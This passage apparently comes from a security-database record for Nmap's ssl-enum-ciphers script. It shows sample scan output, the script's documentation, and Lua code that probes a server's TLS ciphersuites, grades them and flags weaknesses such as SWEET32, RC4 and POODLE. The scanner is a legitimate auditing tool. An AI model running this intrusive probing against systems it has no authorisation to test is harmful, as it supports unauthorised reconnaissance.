TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n | compressors:\n | NULL\n | cipher preference: server\n | warnings:\n | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n | Broken cipher RC4 is deprecated by RFC 7465\n | Ciphersuite uses MD5 for message integrity\n | Weak certificate signature: SHA1\n | TLSv1.2:\n | ciphers:\n | TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A\n | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n | compressors:\n | NULL\n | cipher preference: server\n | warnings:\n | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n | Broken cipher RC4 is deprecated by RFC 7465\n | Ciphersuite uses MD5 for message integrity\n |_ least strength: C\n \n\n## Requires \n\n * comm\n * coroutine\n * math\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * table\n * tls\n * openssl\n\n* * *\n", "edition": 16, "reporter": "Mak Kolybabi <mak@kolybabi.com>, Gabriel Lawrence", "published": "2015-06-23T21:20:23", "title": "ssl-enum-ciphers NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-07-11T05:03:13", "id": "NMAP:SSL-ENUM-CIPHERS.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html", "sourceData": "local comm = require \"comm\"\nlocal coroutine = require \"coroutine\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal sslcert = require \"sslcert\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tls = require \"tls\"\n\ndescription = [[\nThis script repeatedly initiates SSLv3/TLS connections, each time trying a new\ncipher or compressor while recording whether a host accepts or rejects it. The\nend result is a list of all the ciphersuites and compressors that a server accepts.\n\nEach ciphersuite is shown with a letter grade (A through F) indicating the\nstrength of the connection. The grade is based on the cryptographic strength of\nthe key exchange and of the stream cipher. The message integrity (hash)\nalgorithm choice is not a factor. The output line beginning with\n<code>Least strength</code> shows the strength of the weakest cipher offered.\nThe scoring is based on the Qualys SSL Labs SSL Server Rating Guide, but does\nnot take protocol support (TLS version) into account, which makes up 30% of the\nSSL Labs rating.\n\nSSLv3/TLSv1 requires more effort to determine which ciphers and compression\nmethods a server supports than SSLv2. A client lists the ciphers and compressors\nthat it is capable of supporting, and the server will respond with a single\ncipher and compressor chosen, or a rejection notice.\n\nSome servers use the client's ciphersuite ordering: they choose the first of\nthe client's offered suites that they also support. Other servers prefer their\nown ordering: they choose their most preferred suite from among those the\nclient offers. In the case of server ordering, the script makes extra probes to\ndiscover the server's sorted preference list. Otherwise, the list is sorted\nalphabetically.\n\nThe script will warn about certain SSL misconfigurations such as MD5-signed\ncertificates, low-quality ephemeral DH parameters, and the POODLE\nvulnerability.\n\nThis script is intrusive since it must initiate many connections to a server,\nand therefore is quite noisy.\n\nIt is recommended to use this script in conjunction with version detection\n(<code>-sV</code>) in order to discover SSL/TLS services running on unexpected\nports. For the most common SSL ports like 443, 25 (with STARTTLS), 3389, etc.\nthe script is smart enough to run on its own.\n\nReferences:\n* Qualys SSL Labs Rating Guide - https://www.ssllabs.com/projects/rating-guide/\n]]\n\n---\n-- @usage\n-- nmap -sV --script ssl-enum-ciphers -p 443 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | ssl-enum-ciphers:\n-- | TLSv1.0:\n-- | ciphers:\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n-- | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n-- | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n-- | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n-- | compressors:\n-- | NULL\n-- | cipher preference: server\n-- | warnings:\n-- | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n-- | Broken cipher RC4 is deprecated by RFC 7465\n-- | Ciphersuite uses MD5 for message integrity\n-- | Weak certificate signature: SHA1\n-- | TLSv1.2:\n-- | ciphers:\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n-- | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n-- | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n-- | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n-- | compressors:\n-- | NULL\n-- | cipher preference: server\n-- | warnings:\n-- | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n-- | Broken cipher RC4 is deprecated by RFC 7465\n-- | Ciphersuite uses MD5 for message integrity\n-- |_ least strength: C\n--\n-- @xmloutput\n-- <table key=\"TLSv1.0\">\n-- <table key=\"ciphers\">\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_MD5</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- </table>\n-- <table key=\"compressors\">\n-- <elem>NULL</elem>\n-- </table>\n-- <elem key=\"cipher preference\">server</elem>\n-- <table key=\"warnings\">\n-- <elem>64-bit block cipher 3DES vulnerable to SWEET32 attack</elem>\n-- <elem>Broken cipher RC4 is deprecated by RFC 7465</elem>\n-- <elem>Ciphersuite uses MD5 for message integrity</elem>\n-- <elem>Weak certificate signature: SHA1</elem>\n-- </table>\n-- </table>\n-- <table key=\"TLSv1.2\">\n-- <table key=\"ciphers\">\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">\n-- TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">\n-- TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_MD5</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- </table>\n-- <table key=\"compressors\">\n-- <elem>NULL</elem>\n-- </table>\n-- <elem key=\"cipher preference\">server</elem>\n-- <table key=\"warnings\">\n-- <elem>64-bit block cipher 3DES vulnerable to SWEET32 attack</elem>\n-- <elem>Broken cipher RC4 is deprecated by RFC 7465</elem>\n-- <elem>Ciphersuite uses MD5 for message integrity</elem>\n-- </table>\n-- </table>\n-- <elem key=\"least strength\">C</elem>\n\nauthor = {\"Mak Kolybabi <mak@kolybabi.com>\", \"Gabriel Lawrence\"}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"intrusive\"}\ndependencies = {\"https-redirect\"}\n\n-- Test at most this many ciphersuites at a time.\n-- http://seclists.org/nmap-dev/2012/q3/156\n-- http://seclists.org/nmap-dev/2010/q1/859\nlocal CHUNK_SIZE = 64\nlocal have_ssl, openssl = pcall(require,'openssl')\n\n-- Add additional context (protocol) to debug output\nlocal function ctx_log(level, protocol, fmt, ...)\n return stdnse.debug(level, \"(%s) \" .. fmt, protocol, ...)\nend\n\n-- returns a function that yields a new tls record each time it is called\nlocal function get_record_iter(sock)\n local buffer = \"\"\n local i = 1\n local fragment\n return function ()\n local record\n i, record = tls.record_read(buffer, i, fragment)\n if record == nil then\n local status, err\n status, buffer, err = tls.record_buffer(sock, buffer, i)\n if not status then\n return nil, err\n end\n i, record = tls.record_read(buffer, i, fragment)\n if record == nil then\n return nil, \"done\"\n end\n end\n fragment = record.fragment\n return record\n end\nend\n\nlocal function try_params(host, port, t)\n\n -- Use Nmap's own discovered timeout plus 5 seconds for host processing\n -- Default to 10 seconds total.\n local timeout = ((host.times and host.times.timeout) or 5) * 1000 + 5000\n\n -- Create socket.\n local status, sock, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", sock)\n return nil\n end\n else\n sock = nmap.new_socket()\n sock:set_timeout(timeout)\n status, err = sock:connect(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", err)\n sock:close()\n return nil\n end\n end\n\n sock:set_timeout(timeout)\n\n -- Send request.\n local req = tls.client_hello(t)\n status, err = sock:send(req)\n if not status then\n ctx_log(1, t.protocol, \"Can't send: %s\", err)\n sock:close()\n return nil\n end\n\n -- Read response.\n local get_next_record = get_record_iter(sock)\n local records = {}\n while true do\n local record\n record, err = get_next_record()\n if not record then\n ctx_log(1, t.protocol, \"Couldn't read a TLS record: %s\", err)\n sock:close()\n return records\n end\n -- Collect message bodies into one record per type\n records[record.type] = records[record.type] or record\n local done = false\n for j = 1, #record.body do -- no ipairs because we append below\n local b = record.body[j]\n done = ((record.type == \"alert\" and b.level == \"fatal\") or\n (record.type == \"handshake\" and b.type == \"server_hello_done\"))\n table.insert(records[record.type].body, b)\n end\n if done then\n sock:close()\n return records\n end\n end\nend\n\nlocal function sorted_keys(t)\n local ret = {}\n for k, _ in pairs(t) do\n ret[#ret+1] = k\n end\n table.sort(ret)\n return ret\nend\n\nlocal function in_chunks(t, size)\n size = math.floor(size)\n if size < 1 then size = 1 end\n local ret = {}\n for i = 1, #t, size do\n local chunk = {}\n for j = i, i + size - 1 do\n chunk[#chunk+1] = t[j]\n end\n ret[#ret+1] = chunk\n end\n return ret\nend\n\nlocal function remove(t, e)\n for i, v in ipairs(t) do\n if v == e then\n table.remove(t, i)\n return i\n end\n end\n return nil\nend\n\nlocal function slice(t, i, j)\n local output = {}\n while i <= j do\n output[#output+1] = t[i]\n i = i + 1\n end\n return output\nend\n\nlocal function merge(a, b, cmp)\n local output = {}\n local i = 1\n local j = 1\n while i <= #a and j <= #b do\n local winner, err = cmp(a[i], b[j])\n if not winner then\n return nil, err\n end\n if winner == a[i] then\n output[#output+1] = a[i]\n i = i + 1\n else\n output[#output+1] = b[j]\n j = j + 1\n end\n end\n while i <= #a do\n output[#output+1] = a[i]\n i = i + 1\n end\n while j <= #b do\n output[#output+1] = b[j]\n j = j + 1\n end\n return output\nend\n\nlocal function merge_recursive(chunks, cmp)\n if #chunks == 0 then\n return {}\n elseif #chunks == 1 then\n return chunks[1]\n else\n local m = math.floor(#chunks / 2)\n local a, b = slice(chunks, 1, m), slice(chunks, m+1, #chunks)\n local am, err = merge_recursive(a, cmp)\n if not am then\n return nil, err\n end\n local bm, err = merge_recursive(b, cmp)\n if not bm then\n return nil, err\n end\n return merge(am, bm, cmp)\n end\nend\n\n-- https://bugzilla.mozilla.org/show_bug.cgi?id=946147\nlocal function remove_high_byte_ciphers(t)\n local output = {}\n for i, v in ipairs(t) do\n if tls.CIPHERS[v] <= 255 then\n output[#output+1] = v\n end\n end\n return output\nend\n\n-- Get TLS extensions\nlocal function base_extensions(host)\n local tlsname = tls.servername(host)\n return {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n -- Enable SNI if a server name is available\n [\"server_name\"] = tlsname and tls.EXTENSION_HELPERS[\"server_name\"](tlsname),\n }\nend\n\n-- Get a message body from a record which has the specified property set to value\nlocal function get_body(record, property, value)\n for i, b in ipairs(record.body) do\n if b[property] == value then\n return b\n end\n end\n return nil\nend\n\n-- Score a ciphersuite implementation (including key exchange info)\nlocal function score_cipher (kex_strength, cipher_info)\n local kex_score, cipher_score\n if not kex_strength or not cipher_info.size then\n return \"unknown\"\n end\n if kex_strength == 0 then\n return 0\n elseif kex_strength < 512 then\n kex_score = 0.2\n elseif kex_strength < 1024 then\n kex_score = 0.4\n elseif kex_strength < 2048 then\n kex_score = 0.8\n elseif kex_strength < 4096 then\n kex_score = 0.9\n else\n kex_score = 1.0\n end\n\n if cipher_info.size == 0 then\n return 0\n elseif cipher_info.size < 128 then\n cipher_score = 0.2\n elseif cipher_info.size < 256 then\n cipher_score = 0.8\n else\n cipher_score = 1.0\n end\n\n -- Based on SSL Labs' 30-30-40 rating without the first 30% (protocol support)\n return 0.43 * kex_score + 0.57 * cipher_score\nend\n\nlocal function letter_grade (score)\n if not tonumber(score) then return \"unknown\" end\n if score >= 0.80 then\n return \"A\"\n elseif score >= 0.65 then\n return \"B\"\n elseif score >= 0.50 then\n return \"C\"\n elseif score >= 0.35 then\n return \"D\"\n elseif score >= 0.20 then\n return \"E\"\n else\n return \"F\"\n end\nend\n\n-- Find which ciphers out of group are supported by the server.\nlocal function find_ciphers_group(host, port, protocol, group, scores)\n local results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"record_protocol\"] = protocol, -- improve chances of immediate rejection\n [\"extensions\"] = base_extensions(host),\n }\n\n -- This is a hacky sort of tristate variable. There are three conditions:\n -- 1. false = either ciphers or protocol is bad. Keep trying with new ciphers\n -- 2. nil = The protocol is bad. Abandon thread.\n -- 3. true = Protocol works, at least some cipher must be supported.\n local protocol_worked = false\n while (next(group)) do\n t[\"ciphers\"] = group\n\n local records = try_params(host, port, t)\n if not records then\n return nil\n end\n local handshake = records.handshake\n\n if handshake == nil then\n local alert = records.alert\n if alert then\n ctx_log(2, protocol, \"Got alert: %s\", alert.body[1].description)\n if alert[\"protocol\"] ~= protocol then\n ctx_log(1, protocol, \"Protocol mismatch (received %s)\", alert.protocol)\n -- Sometimes this is not an actual rejection of the protocol. Check specifically:\n if get_body(alert, \"description\", \"protocol_version\") then\n protocol_worked = nil\n end\n break\n elseif get_body(alert, \"description\", \"handshake_failure\") then\n protocol_worked = true\n ctx_log(2, protocol, \"%d ciphers rejected.\", #group)\n break\n end\n elseif protocol_worked then\n ctx_log(2, protocol, \"%d ciphers rejected. (No handshake)\", #group)\n else\n ctx_log(1, protocol, \"%d ciphers and/or protocol rejected. (No handshake)\", #group)\n end\n break\n else\n local server_hello = get_body(handshake, \"type\", \"server_hello\")\n if not server_hello then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n end\n if server_hello.protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected. cipher: %s\", server_hello.cipher)\n -- Some implementations will do this if a cipher is supported in some\n -- other protocol version but not this one. Gotta keep trying.\n if not remove(group, server_hello.cipher) then\n -- But if we didn't even offer this cipher, then give up. Crazy!\n protocol_worked = protocol_worked or nil\n end\n break\n else\n protocol_worked = true\n local name = server_hello.cipher\n ctx_log(2, protocol, \"Cipher %s chosen.\", name)\n if not remove(group, name) then\n ctx_log(1, protocol, \"chose cipher %s that was not offered.\", name)\n ctx_log(1, protocol, \"removing high-byte ciphers and trying again.\")\n local size_before = #group\n group = remove_high_byte_ciphers(group)\n ctx_log(1, protocol, \"removed %d high-byte ciphers.\", size_before - #group)\n if #group == size_before then\n -- No changes... Server just doesn't like our offered ciphers.\n break\n end\n else\n -- Add cipher to the list of accepted ciphers.\n table.insert(results, name)\n if scores then\n local info = tls.cipher_info(name)\n -- Some warnings:\n if info.hash and info.hash == \"MD5\" then\n scores.warnings[\"Ciphersuite uses MD5 for message integrity\"] = true\n end\n if info.mode and info.mode == \"CBC\" and info.block_size <= 64 then\n scores.warnings[(\"64-bit block cipher %s vulnerable to SWEET32 attack\"):format(info.cipher)] = true\n end\n if protocol == \"SSLv3\" and info.mode and info.mode == \"CBC\" then\n scores.warnings[\"CBC-mode cipher in SSLv3 (CVE-2014-3566)\"] = true\n elseif info.cipher == \"RC4\" then\n scores.warnings[\"Broken cipher RC4 is deprecated by RFC 7465\"] = true\n end\n local kex = tls.KEX_ALGORITHMS[info.kex]\n local extra, kex_strength\n if kex.anon then\n kex_strength = 0\n elseif kex.export then\n if info.kex:find(\"1024$\") then\n kex_strength = 1024\n else\n kex_strength = 512\n end\n else\n if have_ssl and kex.pubkey then\n local certs = get_body(handshake, \"type\", \"certificate\")\n -- Assume RFC compliance:\n -- \"The sender's certificate MUST come first in the list.\"\n -- This may not always be the case, so\n -- TODO: reorder certificates and validate entire chain\n -- TODO: certificate validation (date, self-signed, etc)\n local c, err\n if certs == nil then\n err = \"no certificate message\"\n else\n c, err = sslcert.parse_ssl_certificate(certs.certificates[1])\n end\n if not c then\n stdnse.debug1(\"Failed to parse certificate: %s\", err)\n elseif c.pubkey.type == kex.pubkey then\n local sigalg = c.sig_algorithm:match(\"([mM][dD][245])\")\n if sigalg then\n -- MD2 and MD5 are broken\n kex_strength = 0\n scores.warnings[\"Insecure certificate signature: \" .. string.upper(sigalg)] = true\n else\n sigalg = c.sig_algorithm:match(\"([sS][hH][aA]1)\")\n if sigalg then\n -- TODO: Update this when SHA-1 is fully deprecated in 2017\n if type(c.notBefore) == \"table\" and c.notBefore.year >= 2016 then\n kex_strength = 0\n scores.warnings[\"Deprecated SHA1 signature in certificate issued after January 1, 2016\"] = true\n end\n scores.warnings[\"Weak certificate signature: SHA1\"] = true\n end\n kex_strength = tls.rsa_equiv(kex.pubkey, c.pubkey.bits)\n if c.pubkey.exponent then\n if openssl.bignum_bn2dec(c.pubkey.exponent) == \"1\" then\n kex_strength = 0\n scores.warnings[\"Certificate RSA exponent is 1, score capped at F\"] = true\n end\n end\n if c.pubkey.ecdhparams then\n if c.pubkey.ecdhparams.curve_params.ec_curve_type == \"namedcurve\" then\n extra = c.pubkey.ecdhparams.curve_params.curve\n else\n extra = string.format(\"%s %d\", c.pubkey.ecdhparams.curve_params.ec_curve_type, c.pubkey.bits)\n end\n else\n extra = string.format(\"%s %d\", kex.pubkey, c.pubkey.bits)\n end\n end\n end\n end\n local ske = get_body(handshake, \"type\", \"server_key_exchange\")\n if kex.server_key_exchange and ske then\n local kex_info = kex.server_key_exchange(ske.data, protocol)\n if kex_info.strength then\n local rsa_bits = tls.rsa_equiv(kex.type, kex_info.strength)\n local low_strength_warning = false\n if kex_strength and kex_strength > rsa_bits then\n kex_strength = rsa_bits\n low_strength_warning = true\n end\n kex_strength = kex_strength or rsa_bits\n if kex_info.ecdhparams then\n if kex_info.ecdhparams.curve_params.ec_curve_type == \"namedcurve\" then\n extra = kex_info.ecdhparams.curve_params.curve\n else\n extra = string.format(\"%s %d\", kex_info.ecdhparams.curve_params.ec_curve_type, kex_info.strength)\n end\n else\n extra = string.format(\"%s %d\", kex.type, kex_info.strength)\n end\n if low_strength_warning then\n scores.warnings[(\n \"Key exchange (%s) of lower strength than certificate key\"\n ):format(extra)] = true\n end\n end\n if kex_info.rsa and kex_info.rsa.exponent == 1 then\n kex_strength = 0\n scores.warnings[\"Certificate RSA exponent is 1, score capped at F\"] = true\n end\n end\n end\n scores[name] = {\n cipher_strength=info.size,\n kex_strength = kex_strength,\n extra = extra,\n letter_grade = letter_grade(score_cipher(kex_strength, info))\n }\n end\n end\n end\n end\n end\n return results, protocol_worked\nend\n\nlocal function get_chunk_size(host, protocol)\n -- Try to make sure we don't send too big of a handshake\n -- https://github.com/ssllabs/research/wiki/Long-Handshake-Intolerance\n local len_t = {\n protocol = protocol,\n ciphers = {},\n extensions = base_extensions(host),\n }\n local cipher_len_remaining = 255 - #tls.client_hello(len_t)\n -- if we're over 255 anyway, just go for it.\n -- Each cipher adds 2 bytes\n local max_chunks = cipher_len_remaining > 1 and cipher_len_remaining // 2 or CHUNK_SIZE\n -- otherwise, use the min\n return max_chunks < CHUNK_SIZE and 